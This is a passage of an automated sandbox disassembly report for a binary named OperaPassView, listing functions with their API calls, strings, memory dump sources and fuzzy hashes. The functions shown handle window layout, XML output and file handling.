                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                        • String ID:
                                        • API String ID: 19018683-0
                                        • Opcode ID: 2cb91dd7ddc020dc7075c663e85983b846ce3e7c7572fcf6cde57d9b21bee265
                                        • Instruction ID: 8457468c7a12c04a8a2756ab15cf5a6a7ead8c4fdf81a6fa8c14e0d140124ace
                                        • Opcode Fuzzy Hash: 2cb91dd7ddc020dc7075c663e85983b846ce3e7c7572fcf6cde57d9b21bee265
                                        • Instruction Fuzzy Hash: DD012872900218EFDF04DFA8DD989AF7BB9FB49701F000529AA11AA195DA71A904CF90
                                        Function 00406A28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                        • memset.MSVCRT ref: 00406A5F
                                          • Part of subcall function 0040ABF1: memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,00406A80,?,?), ref: 0040AC6E
                                          • Part of subcall function 00406327: wcscpy.MSVCRT ref: 0040632C
                                          • Part of subcall function 00406327: _wcslwr.MSVCRT ref: 0040635F
                                        • _snwprintf.MSVCRT ref: 00406AA9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: FileWrite_snwprintf_wcslwrmemcpymemsetwcscpywcslen
                                        • String ID: <%s>%s</%s>$</item>$<item>
                                        • API String ID: 2236007434-2769808009
                                        • Opcode ID: 1c4dfc45c64888dcd19906e1ce87c119c460b1c8613f51e5e6cc6a97c9452b99
                                        • Instruction ID: 532fc3798995e24f7969d992cf274a640e06e6b710a7d6fa20a9e01b27acc6bf
                                        • Opcode Fuzzy Hash: 1c4dfc45c64888dcd19906e1ce87c119c460b1c8613f51e5e6cc6a97c9452b99
                                        • Instruction Fuzzy Hash: DE118232900219BFDB10AF55DC86E99BB65FF04318F10402AF905765E2D775B964DBC8
                                        Function 00408A4C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00408A6D
                                        • RegisterClassW.USER32(?), ref: 00408A92
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00408A99
                                        • CreateWindowExW.USER32(00000000,OperaPassView,OperaPassView,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00408AB8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                        • String ID: OperaPassView
                                        • API String ID: 2678498856-491582363
                                        • Opcode ID: ebee921cd340d24d1c112a0114619ca97e70da3c529be146949097683970dde6
                                        • Instruction ID: 6139fefc9463364463f6ba3dac0f6dfd072d0918ab9cedadf57f00407217c3e7
                                        • Opcode Fuzzy Hash: ebee921cd340d24d1c112a0114619ca97e70da3c529be146949097683970dde6
                                        • Instruction Fuzzy Hash: BD01C8B1901229BBD7119F998D89ADFBEBCFF09750F104216F514F2241D7B45A40CBE9
                                        Function 00406C03 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00406C27
                                        • memset.MSVCRT ref: 00406C3E
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                          • Part of subcall function 00406327: wcscpy.MSVCRT ref: 0040632C
                                          • Part of subcall function 00406327: _wcslwr.MSVCRT ref: 0040635F
                                        • _snwprintf.MSVCRT ref: 00406C7A
                                        Strings
                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00406C43
                                        • <%s>, xrefs: 00406C69
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                        • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                        • API String ID: 168708657-1998499579
                                        • Opcode ID: d4fec9760c6bce6f9e22fa121f8f1f1fb7164566b64fe3a51784db92f15cfb28
                                        • Instruction ID: 659f90def2f8e6d2578ba1f6b517c8c342f70bbf21c1d70c407bd2e86063c475
                                        • Opcode Fuzzy Hash: d4fec9760c6bce6f9e22fa121f8f1f1fb7164566b64fe3a51784db92f15cfb28
                                        • Instruction Fuzzy Hash: AF0144F2D401197BDB20AB55CC46FEA7A6CEF44308F0004B6BA08B60D2D7789A558A9D
                                        Function 004039D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ErrorLastMessage_snwprintf
                                        • String ID: Error$Error %d: %s
                                        • API String ID: 313946961-1552265934
                                        • Opcode ID: dfb88c5729f0bf346466b19c2265fac6ab5e7b0b149df898466e0d6eeb2203f1
                                        • Instruction ID: 8058225859fe7cde546f22b942a46c42c63a718d5ea86f2e76bade30defb87b6
                                        • Opcode Fuzzy Hash: dfb88c5729f0bf346466b19c2265fac6ab5e7b0b149df898466e0d6eeb2203f1
                                        • Instruction Fuzzy Hash: D4F0A7B6540108A6DB11AB95CC46FDA77ECEB48791F0401BBB604B31C1EBB4AA448EAD
                                        Function 0040A6A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wcscpy.MSVCRT ref: 0040A6B6
                                        • wcscpy.MSVCRT ref: 0040A6C7
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,004081ED,?), ref: 0040A6E5
                                        • CloseHandle.KERNEL32(00000000), ref: 0040A6EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscpy$CloseCreateFileHandle
                                        • String ID: General
                                        • API String ID: 999786162-26480598
                                        • Opcode ID: 5a1bcd6ee0fbd5839e7ab1779c391e91d176d6b31a9065dfd3aae4479c58490c
                                        • Instruction ID: 80fd9d1d714720778e2857487aaf7ea67508ef76b285aa25bafc728f417c3cc9
                                        • Opcode Fuzzy Hash: 5a1bcd6ee0fbd5839e7ab1779c391e91d176d6b31a9065dfd3aae4479c58490c
                                        • Instruction Fuzzy Hash: A2E09AB2800211BFE3117B708C59FBF7A9DDB54300F44C83AF95AF2191EA398C5596AE
                                        Function 0040AB86 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(shlwapi.dll,000003EE,75C08FB0,00403210,00000000), ref: 0040AB8F
                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040AB9D
                                        • FreeLibrary.KERNEL32(00000000), ref: 0040ABB5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: SHAutoComplete$shlwapi.dll
                                        • API String ID: 145871493-1506664499
                                        • Opcode ID: 2b13cbe4fa976587dba015ac8bc7e92f1ca77d962969a3839d1cb2f9d6140f48
                                        • Instruction ID: 813b35556bdf0c8ed5bc459e2582449ca7e4d1046522a84e24813c778febaec3
                                        • Opcode Fuzzy Hash: 2b13cbe4fa976587dba015ac8bc7e92f1ca77d962969a3839d1cb2f9d6140f48
                                        • Instruction Fuzzy Hash: 3BD05E35310210EFE651AB66AC88EAF3EA6EFC17617054532FD14F2290CB7C8D16C56A
                                        Function 00403FFE Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemMetrics.USER32(00000011), ref: 0040400F
                                        • GetSystemMetrics.USER32(00000010), ref: 00404015
                                        • 73A1A570.USER32(00000000), ref: 00404023
                                        • GetWindowRect.USER32(?,?), ref: 00404054
                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00404099
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MetricsSystemWindow$A570MoveRect
                                        • String ID:
                                        • API String ID: 3431177557-0
                                        • Opcode ID: 641c8072e981fec5d1e71fc20bd1791d30322c2871cf8ebdd159e8e3a321cb4d
                                        • Instruction ID: 610676b9c3bbbd6da2c0a9868555fe1c154ba3de3cec7fd67c201bf81deea94b
                                        • Opcode Fuzzy Hash: 641c8072e981fec5d1e71fc20bd1791d30322c2871cf8ebdd159e8e3a321cb4d
                                        • Instruction Fuzzy Hash: 71119072A00119EFDB109BB88E49AAF7FB9EB84351F050135AE05F7290DA70AD018AA0
                                        Function 00408FC0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: @$@
                                        • API String ID: 3510742995-149943524
                                        • Opcode ID: 1ec03dd1ac256bf16cb5de4bbe2812bc9e32fdbb007d750df983ae5fdb8a89b1
                                        • Instruction ID: 1de6c34288c87ebc42d99fb55654b1b16bed35321dec598d18253807e7cc7791
                                        • Opcode Fuzzy Hash: 1ec03dd1ac256bf16cb5de4bbe2812bc9e32fdbb007d750df983ae5fdb8a89b1
                                        • Instruction Fuzzy Hash: E3112BF2900709ABCB348E65D88086A77A9EF90354B00063FF906A72D2E735DE59C6DC
                                        Function 00405808 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057AE
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057BC
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057CD
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057E4
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057ED
                                        • ??3@YAXPAX@Z.MSVCRT(?,0040C3F0,00408429,00000000,00408D28,00000000,00000000,00000000,?,?,?,?,00408E6D,/deleteregkey,/savelangfile), ref: 00405823
                                        • ??3@YAXPAX@Z.MSVCRT(?,0040C3F0,00408429,00000000,00408D28,00000000,00000000,00000000,?,?,?,?,00408E6D,/deleteregkey,/savelangfile), ref: 00405836
                                        • ??3@YAXPAX@Z.MSVCRT(?,0040C3F0,00408429,00000000,00408D28,00000000,00000000,00000000,?,?,?,?,00408E6D,/deleteregkey,/savelangfile), ref: 00405849
                                        • ??3@YAXPAX@Z.MSVCRT(?,0040C3F0,00408429,00000000,00408D28,00000000,00000000,00000000,?,?,?,?,00408E6D,/deleteregkey,/savelangfile), ref: 0040585C
                                        • free.MSVCRT ref: 00405895
                                          • Part of subcall function 0040459C: free.MSVCRT ref: 004045A3
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??3@$free
                                        • String ID:
                                        • API String ID: 2241099983-0
                                        • Opcode ID: 261b58cf0eec15e2e1794024efc3ddad4b6e1d3671ff6baf08edaa83f7d118c1
                                        • Instruction ID: 193f175e968b488bcaaaedab1f0f4d2e62d6444421283c25a59f15cf00c5d2b1
                                        • Opcode Fuzzy Hash: 261b58cf0eec15e2e1794024efc3ddad4b6e1d3671ff6baf08edaa83f7d118c1
                                        • Instruction Fuzzy Hash: 5301A033901D209BC2267B6A940141FB364FEC4710305853FE9097B3C28B3CAC519EED
                                        Function 00404CEC Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(?), ref: 00404CFE
                                        • GetWindowRect.USER32(?,?), ref: 00404D0B
                                        • GetClientRect.USER32(00000000,?), ref: 00404D16
                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00404D26
                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00404D42
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ClientParentPoints
                                        • String ID:
                                        • API String ID: 4247780290-0
                                        • Opcode ID: 0d690f730de1b6905f7339d1d32c430505b30dd23a6c25870a45e20dd623eb1d
                                        • Instruction ID: cf7d221995cc0ae4e4d56e5caa9f908b12f985c4a8ff532fce3c53658c4e8bd7
                                        • Opcode Fuzzy Hash: 0d690f730de1b6905f7339d1d32c430505b30dd23a6c25870a45e20dd623eb1d
                                        • Instruction Fuzzy Hash: AE018C72800029BBDB11ABA58D89EFF7FBCEF46750F044129FA01B2040D73895018BA4
                                        Function 0040B625 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403960: CreateFileW.KERNEL32(00000003,80000000,00000003,00000000,00000003,00000000,00000000,00403B2F,?), ref: 00403972
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,00401FCC,?,00681010), ref: 0040B63B
                                        • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,?,00401FCC,?,00681010), ref: 0040B650
                                        • memset.MSVCRT ref: 0040B65E
                                          • Part of subcall function 0040427E: ReadFile.KERNEL32(?,?,?,00000000,00000000), ref: 00404295
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B67E
                                          • Part of subcall function 0040B400: memchr.MSVCRT ref: 0040B43F
                                          • Part of subcall function 0040B400: memcpy.MSVCRT(?,0040C790,0000000B), ref: 0040B4E7
                                          • Part of subcall function 0040B400: memcpy.MSVCRT(?,00000001,00000008), ref: 0040B4F7
                                        • CloseHandle.KERNEL32(00000000,?,?,00401FCC,?,00681010), ref: 0040B686
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: File$memcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                        • String ID:
                                        • API String ID: 2594257661-0
                                        • Opcode ID: 7d084e8c0d917e166d8fc0be95caedd0ef5482d6fb046a78ff3cde73c0d70851
                                        • Instruction ID: 75b962c83f5597cb288aa85692f01b56f0d7078cfcce17b4e6b1c939becd18f7
                                        • Opcode Fuzzy Hash: 7d084e8c0d917e166d8fc0be95caedd0ef5482d6fb046a78ff3cde73c0d70851
                                        • Instruction Fuzzy Hash: 91F06272100214BAC22037769C89E9B3A9CDFC17A4F114A3EF556722D2DB399800D2FD
                                        Function 004057A2 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057AE
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057BC
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057CD
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057E4
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057ED
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: cea9b1777f4fe2077fb01e06492c58dcf486c784f00d0aeebc101b9834385b95
                                        • Instruction ID: 24d33b00e2a7b7b339b6c452371fdc3f9e556b67c2a79a450af54949837e1705
                                        • Opcode Fuzzy Hash: cea9b1777f4fe2077fb01e06492c58dcf486c784f00d0aeebc101b9834385b95
                                        • Instruction Fuzzy Hash: 85F0EC72504B019BD720AF6D95C491BB7E9EB84314B608C3FF049E7682CB38A8406A6C
                                        Function 0040326F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • BeginDeferWindowPos.USER32(00000004), ref: 00403283
                                          • Part of subcall function 004015C8: GetDlgItem.USER32(?,?), ref: 004015D8
                                          • Part of subcall function 004015C8: GetClientRect.USER32(?,?), ref: 004015EA
                                          • Part of subcall function 004015C8: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401654
                                        • EndDeferWindowPos.USER32(00000000), ref: 004032D1
                                        • InvalidateRect.USER32(?,?,00000001), ref: 004032DC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                        • String ID: $
                                        • API String ID: 2498372239-3993045852
                                        • Opcode ID: b4925a47ad5c7c82fa4981d9c831245e3cb2ba26048be89d340e067e16b23bd8
                                        • Instruction ID: ce0dde1c5ccb21ff072573540a66a360195cb02966cd540c61d16c9cc8d8a673
                                        • Opcode Fuzzy Hash: b4925a47ad5c7c82fa4981d9c831245e3cb2ba26048be89d340e067e16b23bd8
                                        • Instruction Fuzzy Hash: FB11B670280208FFEB215F15CCC5F6F7EACDB51B99F10413AF5057A1E1C6B49E0186A8
                                        Function 00406C97 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00406CBB
                                        • memset.MSVCRT ref: 00406CD2
                                          • Part of subcall function 00406327: wcscpy.MSVCRT ref: 0040632C
                                          • Part of subcall function 00406327: _wcslwr.MSVCRT ref: 0040635F
                                        • _snwprintf.MSVCRT ref: 00406D01
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                        • String ID: </%s>
                                        • API String ID: 168708657-259020660
                                        • Opcode ID: a8fdc77576d2d317f1ea72d24cc77227ef8f34cd971395aefd8ac601f1947882
                                        • Instruction ID: 6a416a60d3308e8752733bddb3c0541536534b39e796b9571d08b2a886c5dd3b
                                        • Opcode Fuzzy Hash: a8fdc77576d2d317f1ea72d24cc77227ef8f34cd971395aefd8ac601f1947882
                                        • Instruction Fuzzy Hash: 8F0186F2D401296BD720AB55CC45FEA766CEF45318F0004B6BB08B7082D7789A458BD9
